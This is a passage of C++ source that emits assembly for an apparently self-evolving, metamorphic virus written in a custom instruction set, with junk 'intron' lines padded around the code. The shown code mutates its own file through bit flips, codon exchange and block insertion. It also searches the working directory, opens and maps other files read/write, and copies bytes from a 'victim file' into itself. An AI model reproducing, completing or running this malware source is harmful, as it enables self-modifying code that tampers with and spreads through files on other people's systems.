1430. file << "       _save" << endl; CreateAnIntron();
1431.  
1432. file << "       _pop" << endl; CreateAnIntron();
1433. file << "       _and                     ; BC1=[RandomNumber shr 12] && 0111b" << endl; CreateAnIntron();
1434. file << "       _save" << endl; CreateAnIntron();
1435.  
1436. zer0(1);
1437. addnumber("1");
1438. file << "       _shl                     ; shl BC1, BC2" << endl; CreateAnIntron();
1439. file << "       _save" << endl; CreateAnIntron();
1440.  
1441. file << "       _pop" << endl; CreateAnIntron();
1442. file << "       _push" << endl; CreateAnIntron();
1443. file << "       _saveWrtOff              ; BA1=[MapPointer]+counter" << endl; CreateAnIntron();
1444.  
1445. file << "       _getdata                 ; mov BC1, dword[BC1]" << endl; CreateAnIntron();
1446. file << "       _xor                     ; xor BC1, BC2" << endl; CreateAnIntron();
1447. file << "       _nopdB                   ; save changed byte" << endl; CreateAnIntron();
1448.  
1449.  
1450. zer0(0);
1451. addnumber("7");
1452. file << "       _save" << endl; CreateAnIntron();
1453.  
1454. GetAddress("RandomNumber");
1455.  
1456. file << "       _getdata" << endl; CreateAnIntron();
1457. file << "       _nopdA" << endl; CreateAnIntron();
1458.  
1459. zer0(1);
1460. file << "       _nopdD" << endl; CreateAnIntron();
1461.  
1462. addnumber("VarThreshold1");
1463.  
1464. file << "       _div" << endl; CreateAnIntron();
1465. file << "       _nopsD" << endl; CreateAnIntron();
1466. subsaved(0);
1467. file << "       _JnzDown" << endl;
1468. file << "               _nopsB                   ; restore" << endl;
1469. file << "               _writeByte               ; save mutation!" << endl;
1470. file << "               _nopREAL" << endl;
1471. file << "               _nopREAL" << endl;
1472.  
1473.  
1474. file << "; ##### Finished Bit-Flip Mutation (Point-Mutation)" << endl; CreateAnIntron();
1475. file << "; ############################################################################" << endl; CreateAnIntron();
1476.  
1477.  
1478. CalcNewRandNumberAndSaveIt();
1479.  
1480.  
1481. file << "; ############################################################################" << endl; CreateAnIntron();
1482. file << "; ##### Start codons exchange" << endl; CreateAnIntron();
1483.  
1484.  
1485. GetAddress("xchgBuffer");
1486. file << "       _saveWrtOff" << endl; CreateAnIntron();
1487.  
1488. file << "       _pop" << endl; CreateAnIntron();
1489. file << "       _push                        ; get counter" << endl; CreateAnIntron();
1490.  
1491. file << "       _getdata" << endl; CreateAnIntron();
1492. file << "       _writeDWord                  ; xchgBuffer=dword[counter]" << endl; CreateAnIntron();
1493.  
1494. file << "       _pop" << endl; CreateAnIntron();
1495. file << "       _push                        ; get counter" << endl; CreateAnIntron();
1496. file << "       _saveWrtOff                  ; save destination for potential writing" << endl; CreateAnIntron();
1497.  
1498. addnumber("4");
1499. file << "       _getdata" << endl; CreateAnIntron();
1500. file << "       _nopdB                       ; RegB=dword[counter+4]" << endl; CreateAnIntron();
1501.  
1502.  
1503. zer0(0);
1504. addnumber("7");
1505. file << "       _save" << endl; CreateAnIntron();
1506. GetAddress("RandomNumber");
1507.  
1508. file << "       _getdata" << endl; CreateAnIntron();
1509. file << "       _nopdA" << endl; CreateAnIntron();
1510.  
1511. zer0(1);
1512. file << "       _nopdD" << endl; CreateAnIntron();
1513.  
1514. addnumber("xchgThreshold1");
1515.  
1516. file << "       _div" << endl; CreateAnIntron();
1517. file << "       _nopsD" << endl; CreateAnIntron();
1518. subsaved(0);
1519.  
1520. file << "       _JnzDown                 ; if not zero, dont exchange codons" << endl;
1521. file << "           _nopsB                   ; restore" << endl;
1522. file << "           _writeDWord              ; save mutation!" << endl;
1523. file << "           _nopREAL" << endl;
1524. file << "           _nopREAL" << endl;
1525.  
1526. GetAddress("xchgBuffer");
1527. file << "       _getdata" << endl; CreateAnIntron();
1528.  
1529. file << "       _nopdB" << endl; CreateAnIntron();
1530.  
1531. file << "       _pop" << endl; CreateAnIntron();
1532. file << "       _push                    ; get counter" << endl; CreateAnIntron();
1533. addnumber("4");
1534. file << "       _saveWrtOff" << endl; CreateAnIntron();
1535.  
1536.  
1537. zer0(0);
1538. addnumber("7");
1539. file << "       _save" << endl; CreateAnIntron();
1540. GetAddress("RandomNumber");
1541.  
1542. file << "       _getdata" << endl; CreateAnIntron();
1543. file << "       _nopdA" << endl; CreateAnIntron();
1544.  
1545. zer0(1);
1546. file << "       _nopdD" << endl; CreateAnIntron();
1547.  
1548. addnumber("xchgThreshold1");
1549.  
1550. file << "       _div" << endl; CreateAnIntron();
1551. file << "       _nopsD" << endl; CreateAnIntron();
1552. subsaved(0);
1553.  
1554. file << "       _JnzDown                 ; if not zero, dont exchange codons" << endl;
1555. file << "           _nopsB                   ; restore" << endl;
1556. file << "           _writeDWord              ; save mutation!" << endl;
1557. file << "           _nopREAL" << endl;
1558. file << "           _nopREAL" << endl;
1559.  
1560.  
1561.  
1562. CalcNewRandNumberAndSaveIt();
1563.  
1564.  
1565. file << "       _pop" << endl; CreateAnIntron();
1566. addnumber("1");
1567. file << "       _nopdB                   ; inc counter" << endl; CreateAnIntron();
1568.  
1569. GetAddress("MapPointer");
1570. file << "       _getdata" << endl; CreateAnIntron();
1571. file << "       _save" << endl; CreateAnIntron();
1572. zer0(1);
1573.  
1574. GetAddress("FileSize");
1575. file << "       _getdata" << endl; CreateAnIntron();
1576.  
1577. file << "       _sub0001" << endl; CreateAnIntron();
1578. file << "       _sub0001" << endl; CreateAnIntron();
1579. file << "       _sub0001" << endl; CreateAnIntron();
1580. file << "       _sub0001" << endl; CreateAnIntron();
1581. file << "       _sub0001" << endl; CreateAnIntron();
1582. file << "       _sub0001" << endl; CreateAnIntron();
1583. file << "       _sub0001" << endl; CreateAnIntron();
1584. file << "       _sub0001" << endl; CreateAnIntron();
1585. file << "       _sub0001     ; Dont mutate the last 9 bytes because of xchg problems" << endl; CreateAnIntron();
1586.  
1587. file << "       _addsaved" << endl; CreateAnIntron();
1588. file << "       _save                    ; mov save, [MapPointer]+GenomEndInMap" << endl; CreateAnIntron();
1589.  
1590. file << "       _nopsB" << endl; CreateAnIntron();
1591. subsaved(0);
1592. file << "       _JnzUp                   ; jnz esi" << endl; CreateAnIntron();
1593. file << "; loop ANextByteInChain" << endl; CreateAnIntron();
1594.  
1595. file << "; ##### Finished codons exchange" << endl; CreateAnIntron();
1596. file << "; ############################################################################" << endl; CreateAnIntron();
1597.  
1598. GetAddress("RandomNumber");
1599.  
1600. file << "       _getdata" << endl; CreateAnIntron();
1601. file << "       _nopdA" << endl; CreateAnIntron();
1602. zer0(0);
1603. file << "       _nopdD" << endl; CreateAnIntron();
1604.  
1605. addnumber("InsertThreshold1");
1606.  
1607. file << "       _div" << endl; CreateAnIntron();
1608. file << "       _nopsD" << endl; CreateAnIntron();
1609.  
1610. file << "       _push                ; Save Result = (rand() % InsertThreshold1)" << endl; CreateAnIntron();
1611.  
1612. CalcNewRandNumberAndSaveIt();
1613.  
1614.  
1615.  
1616.  
1617.  
1618. GetAddress("RandomNumber");
1619. file << "       _getdata" << endl; CreateAnIntron();
1620. file << "       _nopdA                               ; mov RegA, [RandomNumber]" << endl; CreateAnIntron();
1621.  
1622. zer0(0);
1623. file << "       _nopdD                               ; mov RegD, 0" << endl; CreateAnIntron();
1624.  
1625. GetAddress("FileSize");
1626. file << "       _getdata" << endl; CreateAnIntron();
1627. file << "       _nopdB                               ; RegB=FileSize" << endl; CreateAnIntron();
1628.  
1629. file << "       _div                                 ; div BC1 <- RegD = rand() % FileSize = nBeforeIns" << endl; CreateAnIntron();
1630.  
1631. GetAddress("InsStart");
1632. file << "       _saveWrtOff" << endl; CreateAnIntron();
1633.  
1634. file << "       _nopsD                               ; BC1=nBeforeIns" << endl; CreateAnIntron();
1635. file << "       _save                                ; BC2=nBeforeIns" << endl; CreateAnIntron();
1636.  
1637. file << "       _nopsB                               ; BC1=FileSize" << endl; CreateAnIntron();
1638. subsaved(1);
1639. file << "       _nopdB                               ; RegB=(FileSize-nBeforeIns)" << endl; CreateAnIntron();
1640.  
1641. GetAddress("MapPointer");
1642. file << "       _getdata                             ; BC1=MapPoint" << endl; CreateAnIntron();
1643. file << "       _addsaved                            ; BC1=MapPoint + nBeforeIns = InsStart" << endl; CreateAnIntron();
1644.  
1645. file << "       _writeDWord                          ; !!! InsStart=MapPoint + nBeforeIns" << endl; CreateAnIntron();
1646. file << "       _push" << endl; CreateAnIntron();
1647.  
1648.  
1649.  
1650. CalcNewRandNumberAndSaveIt();
1651.  
1652. GetAddress("nBlockSize");
1653. file << "       _saveWrtOff" << endl; CreateAnIntron();
1654.  
1655. GetAddress("RandomNumber");
1656. file << "       _getdata" << endl; CreateAnIntron();
1657. file << "       _nopdA                               ; mov RegA, [RandomNumber]" << endl; CreateAnIntron();
1658.  
1659. zer0(0);
1660. file << "       _nopdD                               ; mov RegD, 0" << endl; CreateAnIntron();
1661. addnumber("32");
1662.  
1663. file << "       _div                                 ; div BC1 <- RegD = rand() % 32 = nBlockSize" << endl; CreateAnIntron();
1664.  
1665.  
1666.  
1667. file << "       _nopsD                               ; BC1=nBlockSize" << endl; CreateAnIntron();
1668. addnumber("1");
1669. file << "       _writeDWord                          ; !!! nBlockSize" << endl; CreateAnIntron();
1670.  
1671. file << "       _save                                ; BC2=nBlockSize" << endl; CreateAnIntron();
1672.  
1673. GetAddress("InsEnd");
1674. file << "       _saveWrtOff" << endl; CreateAnIntron();
1675.  
1676. file << "       _pop                                 ; BC1 = InsStart" << endl; CreateAnIntron();
1677. file << "       _addsaved                            ; BC1 = InsStart + nBlockSize = InsEnd" << endl; CreateAnIntron();
1678.  
1679. file << "       _writeDWord                          ; !!! InsEnd" << endl; CreateAnIntron();
1680.  
1681.  
1682.  
1683. CalcNewRandNumberAndSaveIt();
1684.  
1685. GetAddress("nByteBlockToMov");
1686. file << "       _saveWrtOff" << endl; CreateAnIntron();
1687.  
1688. GetAddress("RandomNumber");
1689. file << "       _getdata" << endl; CreateAnIntron();
1690. file << "       _nopdA                               ; mov RegA, [RandomNumber]" << endl; CreateAnIntron();
1691.  
1692. zer0(0);
1693. file << "       _nopdD                               ; mov RegD, 0" << endl; CreateAnIntron();
1694.  
1695. file << "       _nopsB                               ; BC1=(FileSize-nBeforeIns)" << endl; CreateAnIntron();
1696.  
1697. file << "       _div" << endl; CreateAnIntron();
1698.  
1699. file << "       _nopsD                               ; BC1=nByteBlockToMov" << endl; CreateAnIntron();
1700. addnumber("1");
1701. file << "       _writeDWord                          ; !!! nByteBlockToMov" << endl; CreateAnIntron();
1702.  
1703. GetAddress("InsStart");
1704. file << "       _getdata" << endl; CreateAnIntron();
1705. file << "       _nopdA               ; RegA=InsStart" << endl; CreateAnIntron();
1706.  
1707. GetAddress("InsEnd");
1708. file << "       _getdata" << endl; CreateAnIntron();
1709. file << "       _nopdB               ; RegB=InsEnd" << endl; CreateAnIntron();
1710.  
1711. GetAddress("nByteBlockToMov");
1712. file << "       _getdata" << endl; CreateAnIntron();
1713. file << "       _nopdD               ; RegD=nByteBlockToMov=c" << endl; CreateAnIntron();
1714.  
1715. file << "; do" << endl; CreateAnIntron();
1716. file << "       _getEIP" << endl; CreateAnIntron();
1717. file << "       _sub0001" << endl; CreateAnIntron();
1718. file << "       _sub0001" << endl; CreateAnIntron();
1719. file << "       _sub0001" << endl; CreateAnIntron();
1720. file << "       _sub0001" << endl; CreateAnIntron();
1721. file << "       _sub0001" << endl; CreateAnIntron();
1722. file << "       _saveJmpOff          ; mov BA2, eip" << endl; CreateAnIntron();
1723.  
1724. file << "       _nopsD               ; BC1=c" << endl; CreateAnIntron();
1725. file << "       _save                ; BC2=c" << endl; CreateAnIntron();
1726.  
1727. file << "       _nopsB               ; BC1=InsEnd" << endl; CreateAnIntron();
1728. file << "       _addsaved            ; BC1=InsEnd+c" << endl; CreateAnIntron();
1729. file << "       _saveWrtOff          ; BA1=InsEnd+c" << endl; CreateAnIntron();
1730.  
1731.  
1732. file << "       _pop                 ; If BC1=0: mutate" << endl; CreateAnIntron();
1733. file << "       _push" << endl; CreateAnIntron();
1734. addnumber("1");
1735. file << "       _sub0001             ; Get the zer0 flag" << endl; CreateAnIntron();
1736. file << "       _JnzDown" << endl;
1737. file << "               _nopsA               ; BC1=InsStart" << endl;
1738. file << "               _addsaved            ; BC1=InsStart+c" << endl;
1739. file << "               _getdata             ; BC1=*(InsStart+c)" << endl;
1740. file << "               _writeByte           ; *(InsEnd+c)==*(InsStart+c)" << endl;
1741.  
1742. file << "       _nopsD" << endl; CreateAnIntron();
1743. file << "       _sub0001" << endl; CreateAnIntron();
1744. file << "       _nopdD               ; RegD=c-1" << endl; CreateAnIntron();
1745.  
1746. file << "       _JnzUp" << endl; CreateAnIntron();
1747. file << "; while --c" << endl; CreateAnIntron();
1748.  
1749. file << "; Already set:" << endl; CreateAnIntron();
1750. GetAddress("InsStart");
1751. file << ";        _getdata" << endl; CreateAnIntron();
1752. file << ";        _nopdA               ; RegA=InsStart" << endl; CreateAnIntron();
1753.  
1754. zer0(0);
1755. addnumber("144");
1756. file << "       _nopdB" << endl; CreateAnIntron();
1757.  
1758. GetAddress("nBlockSize");
1759. file << "       _getdata" << endl; CreateAnIntron();
1760. file << "       _nopdD               ; RegD=nBlockSize=c" << endl; CreateAnIntron();
1761.  
1762.  
1763. file << "; do" << endl; CreateAnIntron();
1764. file << "       _getEIP" << endl; CreateAnIntron();
1765. file << "       _sub0001" << endl; CreateAnIntron();
1766. file << "       _sub0001" << endl; CreateAnIntron();
1767. file << "       _sub0001" << endl; CreateAnIntron();
1768. file << "       _sub0001" << endl; CreateAnIntron();
1769. file << "       _sub0001" << endl; CreateAnIntron();
1770. file << "       _saveJmpOff          ; mov BA2, eip" << endl; CreateAnIntron();
1771.  
1772. file << "       _nopsD               ; BC1=c" << endl; CreateAnIntron();
1773. file << "       _save                ; BC2=c" << endl; CreateAnIntron();
1774.  
1775. file << "       _nopsA               ; BC1=InsStart" << endl; CreateAnIntron();
1776. file << "       _addsaved            ; BC1=InsStart+c" << endl; CreateAnIntron();
1777. file << "       _saveWrtOff          ; BA1=InsStart+c" << endl; CreateAnIntron();
1778.  
1779.  
1780.  
1781. file << "       _pop                 ; If BC1=0: mutate" << endl; CreateAnIntron();
1782. file << "       _push" << endl; CreateAnIntron();
1783. addnumber("1");
1784. file << "       _sub0001             ; Get the zer0 flag" << endl; CreateAnIntron();
1785. file << "       _JnzDown" << endl;
1786. file << "               _nopREAL" << endl;
1787. file << "               _nopREAL" << endl;
1788. file << "               _nopsB" << endl;
1789. file << "               _writeByte           ; *(InsStart+c)==_nopREAL" << endl;
1790.  
1791. file << "       _nopsD" << endl; CreateAnIntron();
1792. file << "       _sub0001" << endl; CreateAnIntron();
1793. file << "       _nopdD               ; RegD=c-1" << endl; CreateAnIntron();
1794.  
1795. file << "       _JnzUp" << endl; CreateAnIntron();
1796. file << "; while --c" << endl; CreateAnIntron();
1797.  
1798. file << "       _pop         ; remove (rand() % InsertThreshold1) from Stack" << endl; CreateAnIntron();
1799.  
1800.  
1801.  
1802. zer0(0);
1803. addnumber("((HGTEnd1-HGTStart1)*8)");
1804.  
1805. file << "       _save" << endl; CreateAnIntron();
1806.  
1807.  
1808. file << "       _getEIP" << endl; CreateAnIntron();
1809.  
1810. file << "     HGTStart1:" << endl; CreateAnIntron();
1811. addnumber("3");
1812. file << "       _addsaved" << endl; CreateAnIntron();
1813. file << "       _nopdB                               ; Save Addresse in RegB" << endl; CreateAnIntron();
1814.  
1815.  
1816. CalcNewRandNumberAndSaveIt();
1817.  
1818. GetAddress("RandomNumber");
1819. file << "       _getdata" << endl; CreateAnIntron();
1820. file << "       _nopdA                               ; mov RegA, [RandomNumber]" << endl; CreateAnIntron();
1821.  
1822. zer0(0);
1823. file << "       _nopdD                               ; mov RegD, 0" << endl; CreateAnIntron();
1824. addnumber("HGTThreshold1");
1825.  
1826. file << "       _div                                 ; div BC1 <- RegD = rand() % HGTThreshold1" << endl; CreateAnIntron();
1827.  
1828. file << "       _nopsD" << endl; CreateAnIntron();
1829. file << "       _save" << endl; CreateAnIntron();
1830. file << "       _and                                 ; Is zero?" << endl; CreateAnIntron();
1831.  
1832. file << "       _JnzDown                             ; Simulate a JzDown" << endl;
1833.  
1834. file << "               _nopREAL     ; BC1=0" << endl;
1835. file << "               _nopREAL" << endl;
1836. file << "               _add0001" << endl;
1837. file << "               _JnzDown" << endl;
1838.  
1839.  
1840. file << "                       _nopsB     ; BC1!=0" << endl;
1841. file << "                       _call      ; jmp over HGT" << endl;
1842. file << "                       _nopREAL" << endl;
1843. file << "                       _nopREAL" << endl;
1844.  
1845.  
1846. GetAddress("HGT_searchmask");
1847. file << "       _saveWrtOff" << endl; CreateAnIntron();
1848. zer0(0);
1849. addnumber("0x002A2E2A");
1850. file << "       _writeDWord" << endl; CreateAnIntron();
1851.  
1852.  
1853. GetAddress("WIN32_FIND_DATA_struct");
1854. file << "       _push" << endl; CreateAnIntron();
1855. GetAddress("HGT_searchmask");
1856. file << "       _push" << endl; CreateAnIntron();
1857. CallAPI("hFindFirstFileA");
1858.  
1859.  
1860. GetAddress("HGT_FFHandle");
1861. file << "       _saveWrtOff" << endl; CreateAnIntron();
1862. file << "       _nopsA" << endl; CreateAnIntron();
1863. file << "       _writeDWord                   ; Save FindHandle" << endl; CreateAnIntron();
1864.  
1865. file << "       _getEIP" << endl; CreateAnIntron();
1866. file << "       _sub0001" << endl; CreateAnIntron();
1867. file << "       _sub0001" << endl; CreateAnIntron();
1868. file << "       _sub0001" << endl; CreateAnIntron();
1869. file << "       _sub0001" << endl; CreateAnIntron();
1870. file << "       _sub0001" << endl; CreateAnIntron();
1871. file << "       _saveJmpOff          ; Start of the loop" << endl; CreateAnIntron();
1872.  
1873.  
1874. file << "               ; Calculate the call addresse if the file is not ok" << endl; CreateAnIntron();
1875. zer0(0);
1876. addnumber("((HGTFileEnd1-HGTFileStart1)*8)");
1877. file << "               _save" << endl; CreateAnIntron();
1878.  
1879. file << "               _getEIP" << endl; CreateAnIntron();
1880.  
1881. file << "        HGTFileStart1:" << endl; CreateAnIntron();
1882. addnumber("3");
1883. file << "               _addsaved" << endl; CreateAnIntron();
1884. file << "               _push                                ; Save Addresse on Stack" << endl; CreateAnIntron();
1885.  
1886. GetAddress("HGTFileHandle");
1887. file << "                                                       ; be Closed later in any case," << endl; CreateAnIntron();
1888. file << "                                                       ; except for [Handle]==0x0" << endl; CreateAnIntron();
1889. file << "               _saveWrtOff" << endl; CreateAnIntron();
1890. zer0(0);
1891. file << "               _writeDWord" << endl; CreateAnIntron();
1892.  
1893. GetAddress("HGTMapHandle");
1894. file << "               _saveWrtOff" << endl; CreateAnIntron();
1895. zer0(0);
1896. file << "               _writeDWord" << endl; CreateAnIntron();
1897.  
1898. GetAddress("HGTDidInsert");
1899. file << "               _saveWrtOff" << endl; CreateAnIntron();
1900. zer0(0);
1901. file << "               _sub0001" << endl; CreateAnIntron();
1902. file << "               _writeDWord" << endl; CreateAnIntron();
1903.  
1904. zer0(0);
1905. addnumber("FILE_ATTRIBUTE_DIRECTORY");
1906. file << "               _save" << endl; CreateAnIntron();
1907. GetAddress("WIN32_FIND_DATA_dwFileAttributes");
1908. file << "               _getdata" << endl; CreateAnIntron();
1909. subsaved(0);
1910.  
1911. file << "               _JnzDown                             ; Simulate a JzDown" << endl;
1912. file << "                       _pop     ; BC1=0" << endl;
1913. file << "                       _push" << endl;
1914. file << "                       _call    ; If directory -> Do not open..." << endl;
1915. file << "                       _nopREAL" << endl;
1916.  
1917.  
1918. CalcNewRandNumberAndSaveIt();
1919.  
1920. GetAddress("RandomNumber");
1921. file << "               _getdata" << endl; CreateAnIntron();
1922. file << "               _nopdA" << endl; CreateAnIntron();
1923.  
1924. zer0(0);
1925. file << "               _nopdD" << endl; CreateAnIntron();
1926.  
1927. addnumber("5");
1928. file << "               _div" << endl; CreateAnIntron();
1929.  
1930. file << "               _nopsD" << endl; CreateAnIntron();
1931. file << "               _save" << endl; CreateAnIntron();
1932. file << "               _and" << endl; CreateAnIntron();
1933.  
1934. file << "               _JnzDown                             ; Simulate a JzDown" << endl;
1935.  
1936. file << "                       _nopREAL   ; BC=0" << endl;
1937. file << "                       _nopREAL" << endl;
1938. file << "                       _add0001" << endl;
1939. file << "                       _JnzDown" << endl;
1940.  
1941. file << "                               _pop     ; BC!=0" << endl;
1942. file << "                               _push" << endl;
1943. file << "                               _call    ; Not this file..." << endl;
1944. file << "                               _nopREAL" << endl;
1945.  
1946.  
1947. file << "               ; OPEN FILE NOW" << endl; CreateAnIntron();
1948. zer0(0);
1949. file << "               _push" << endl; CreateAnIntron();
1950. file << "               _push" << endl; CreateAnIntron();
1951. addnumber("3");
1952. file << "               _push" << endl; CreateAnIntron();
1953. zer0(0);
1954. file << "               _push" << endl; CreateAnIntron();
1955. addnumber("1");
1956. file << "               _push" << endl; CreateAnIntron();
1957. file << "               _sub0001" << endl; CreateAnIntron();
1958. addnumber("0xC0000000");
1959. file << "               _push" << endl; CreateAnIntron();
1960. GetAddress("WIN32_FIND_DATA_cFileName");
1961. file << "               _push" << endl; CreateAnIntron();
1962. CallAPI("hCreateFileA");
1963.  
1964. GetAddress("HGTFileHandle");
1965. file << "               _saveWrtOff" << endl; CreateAnIntron();
1966. file << "               _nopsA" << endl; CreateAnIntron();
1967. file << "               _writeDWord              ; mov dword[HGTFileHandle], RegA" << endl; CreateAnIntron();
1968.  
1969. file << "               _save" << endl; CreateAnIntron();
1970.  
1971. file << "               _nopsA" << endl; CreateAnIntron();
1972. addnumber("1");
1973. file << "                                       ; -> if error: BC1=0" << endl; CreateAnIntron();
1974.  
1975. file << "               _JnzDown                             ; Simulate a JzDown" << endl;
1976. file << "                       _pop     ; BC1=0" << endl;
1977. file << "                       _push" << endl;
1978. file << "                       _call    ; If INVALID_HANDLE_VALUE -> Do not open..." << endl;
1979. file << "                       _nopREAL" << endl;
1980.  
1981. GetAddress("HGTFileSize");
1982.  
1983. file << "               _push" << endl; CreateAnIntron();
1984. zer0(1);
1985. file << "               _addsaved" << endl; CreateAnIntron();
1986. file << "               _push" << endl; CreateAnIntron();
1987. CallAPI("hGetFileSize");
1988.  
1989. GetAddress("HGTFileSize");
1990. file << "               _saveWrtOff" << endl; CreateAnIntron();
1991. file << "               _nopsA" << endl; CreateAnIntron();
1992. file << "               _writeDWord              ; mov dword[HGTFileSize], RegA" << endl; CreateAnIntron();
1993.  
1994. zer0(1);
1995. file << "               _push" << endl; CreateAnIntron();
1996. file << "               _addsaved" << endl; CreateAnIntron();
1997. file << "               _push" << endl; CreateAnIntron();
1998. zer0(0);
1999. file << "               _push" << endl; CreateAnIntron();
2000. addnumber("4");
2001. file << "               _push" << endl; CreateAnIntron();
2002. zer0(0);
2003. file << "               _push" << endl; CreateAnIntron();
2004. GetAddress("HGTFileHandle");
2005. file << "               _getdata" << endl; CreateAnIntron();
2006. file << "               _push" << endl; CreateAnIntron();
2007. CallAPI("hCreateFileMappingA");
2008.  
2009.  
2010. GetAddress("HGTMapHandle");
2011.  
2012. file << "               _saveWrtOff" << endl; CreateAnIntron();
2013. file << "               _nopsA" << endl; CreateAnIntron();
2014. file << "               _writeDWord               ; mov dword[HGTMapHandle], RegA" << endl; CreateAnIntron();
2015.  
2016. file << "               _save" << endl; CreateAnIntron();
2017.  
2018. file << "               _nopsA" << endl; CreateAnIntron();
2019. file << "               _save" << endl; CreateAnIntron();
2020. file << "               _and" << endl; CreateAnIntron();
2021. file << "               _JnzDown                             ; Simulate a JzDown" << endl;
2022.  
2023. file << "                       _pop     ; BC1=0" << endl;
2024. file << "                       _push" << endl;
2025. file << "                       _call    ; If NULL -> Do not open..." << endl;
2026. file << "                       _nopREAL" << endl;
2027.  
2028. GetAddress("HGTFileSize");
2029.  
2030. file << "               _getdata" << endl; CreateAnIntron();
2031. file << "               _push   ; [HGTFileSize]" << endl; CreateAnIntron();
2032. zer0(1);
2033. file << "               _push   ; 0" << endl; CreateAnIntron();
2034. file << "               _push   ; 0" << endl; CreateAnIntron();
2035. addnumber("2");
2036. file << "               _push" << endl; CreateAnIntron();
2037. zer0(1);
2038. file << "               _addsaved" << endl; CreateAnIntron();
2039. file << "               _push   ; MapHandle" << endl; CreateAnIntron();
2040.  
2041. CallAPI("hMapViewOfFile");
2042.  
2043. GetAddress("HGTMapPointer");
2044.  
2045. file << "               _saveWrtOff" << endl; CreateAnIntron();
2046. file << "               _nopsA" << endl; CreateAnIntron();
2047. file << "               _writeDWord              ; mov dword[HGTMapPointer], RegA" << endl; CreateAnIntron();
2048.  
2049. file << "               _nopsA" << endl; CreateAnIntron();
2050. file << "               _save" << endl; CreateAnIntron();
2051. file << "               _and" << endl; CreateAnIntron();
2052. file << "               _JnzDown         ; Simulate a JzDown" << endl;
2053. file << "                       _pop     ; BC1=0" << endl;
2054. file << "                       _push" << endl;
2055. file << "                       _call    ; If NULL -> Do not open..." << endl;
2056. file << "                       _nopREAL" << endl;
2057.  
2058.  
2059. CalcNewRandNumberAndSaveIt();
2060.  
2061. GetAddress("RandomNumber");
2062. file << "               _getdata" << endl; CreateAnIntron();
2063. file << "               _nopdA" << endl; CreateAnIntron();
2064.  
2065. zer0(0);
2066. file << "               _nopdD" << endl; CreateAnIntron();
2067.  
2068. GetAddress("HGTFileSize");
2069. file << "               _getdata" << endl; CreateAnIntron();
2070.  
2071. file << "               _div" << endl; CreateAnIntron();
2072.  
2073. file << "               _nopsD" << endl; CreateAnIntron();
2074. file << "               _save" << endl; CreateAnIntron();
2075.  
2076. GetAddress("HGTMapPointer");
2077. file << "               _getdata" << endl; CreateAnIntron();
2078.  
2079. file << "               _addsaved" << endl; CreateAnIntron();
2080.  
2081. file << "               _push                ; Start in sourcefile" << endl; CreateAnIntron();
2082.  
2083.  
2084. CalcNewRandNumberAndSaveIt();
2085.  
2086. GetAddress("RandomNumber");
2087. file << "               _getdata" << endl; CreateAnIntron();
2088. file << "               _nopdA" << endl; CreateAnIntron();
2089.  
2090. zer0(0);
2091. file << "               _nopdD" << endl; CreateAnIntron();
2092.  
2093. GetAddress("FileSize");
2094. file << "               _getdata" << endl; CreateAnIntron();
2095.  
2096. file << "               _div" << endl; CreateAnIntron();
2097.  
2098. file << "               _nopsD" << endl; CreateAnIntron();
2099. file << "               _save" << endl; CreateAnIntron();
2100.  
2101. GetAddress("MapPointer");
2102. file << "               _getdata" << endl; CreateAnIntron();
2103. file << "               _addsaved" << endl; CreateAnIntron();
2104.  
2105. file << "               _push                ; Start in my file" << endl; CreateAnIntron();
2106.  
2107.  
2108. CalcNewRandNumberAndSaveIt();
2109.  
2110. GetAddress("RandomNumber");
2111. file << "               _getdata" << endl; CreateAnIntron();
2112. file << "               _nopdA" << endl; CreateAnIntron();
2113.  
2114. zer0(0);
2115. file << "               _nopdD" << endl; CreateAnIntron();
2116.  
2117. addnumber("11");
2118.  
2119. file << "               _div" << endl; CreateAnIntron();
2120. file << "               _nopsD" << endl; CreateAnIntron();
2121. addnumber("1");
2122. file << "               _nopdD" << endl; CreateAnIntron();
2123.  
2124. file << "               ; Size in RegD" << endl; CreateAnIntron();
2125.  
2126.  
2127. file << "               _pop         ; Start in my file" << endl; CreateAnIntron();
2128. file << "               _nopdB" << endl; CreateAnIntron();
2129.  
2130.  
2131. file << "               _pop         ; Start in victim file" << endl; CreateAnIntron();
2132. file << "               _nopdA" << endl; CreateAnIntron();
2133.  
2134. file << "               _pushall" << endl; CreateAnIntron();
2135. file << "               _getEIP" << endl; CreateAnIntron();
2136. file << "               _sub0001" << endl; CreateAnIntron();
2137. file << "               _sub0001" << endl; CreateAnIntron();
2138. file << "               _sub0001" << endl; CreateAnIntron();
2139. file << "               _sub0001" << endl; CreateAnIntron();
2140. file << "               _sub0001" << endl; CreateAnIntron();
2141.  
2142. file << "               _saveJmpOff          ; Save everything, especially the old BA2" << endl; CreateAnIntron();
2143.  
2144. file << "                       _nopsB" << endl; CreateAnIntron();
2145. file << "                       _saveWrtOff" << endl; CreateAnIntron();
2146. addnumber("1");
2147. file << "                       _nopdB" << endl; CreateAnIntron();
2148.  
2149. file << "                       _nopsA" << endl; CreateAnIntron();
2150. addnumber("1");
2151. file << "                       _nopdA" << endl; CreateAnIntron();
2152. file << "                       _sub0001" << endl; CreateAnIntron();
2153. file << "                       _getdata" << endl; CreateAnIntron();
2154.  
2155. file << "                       _writeByte" << endl; CreateAnIntron();
2156.  
2157. file << "                       _nopsD" << endl; CreateAnIntron();
2158. file << "                       _sub0001" << endl; CreateAnIntron();
2159. file << "                       _nopdD" << endl; CreateAnIntron();
2160.  
2161. file << "               _JnzUp" << endl; CreateAnIntron();
2162. file << "               _popall              ; Get old BA2 again" << endl; CreateAnIntron();
2163.  
2164. GetAddress("HGTDidInsert");
2165. file << "               _saveWrtOff" << endl; CreateAnIntron();
2166. zer0(0);
2167. file << "               _writeDWord" << endl; CreateAnIntron();
2168.  
2169.  
2170. file << "               _push        ; trash" << endl; CreateAnIntron();
2171.  
2172. file << "        HGTFileEnd1:" << endl; CreateAnIntron();
2173. file << "               _pop         ; from call" << endl; CreateAnIntron();
2174. file << "               _pop         ; saved address" << endl; CreateAnIntron();
2175.  
2176. GetAddress("HGTMapPointer");
2177. file << "               _getdata" << endl; CreateAnIntron();
2178. file << "               _push" << endl; CreateAnIntron();
2179. CallAPI("hUnmapViewOfFile");
2180.  
2181.  
2182. file << "               _getDO" << endl; CreateAnIntron();
2183. addnumber("(hCloseHandle-DataOffset)");
2184. file << "               _getdata" << endl; CreateAnIntron();
2185. file << "               _nopdA       ; Save API in RegA" << endl; CreateAnIntron();
2186.  
2187. GetAddress("HGTMapHandle");
2188. file << "               _getdata" << endl; CreateAnIntron();
2189. file << "               _push" << endl; CreateAnIntron();
2190. file << "               _save" << endl; CreateAnIntron();
2191. file << "               _and" << endl; CreateAnIntron();
2192.  
2193. file << "               _JnzDown" << endl;
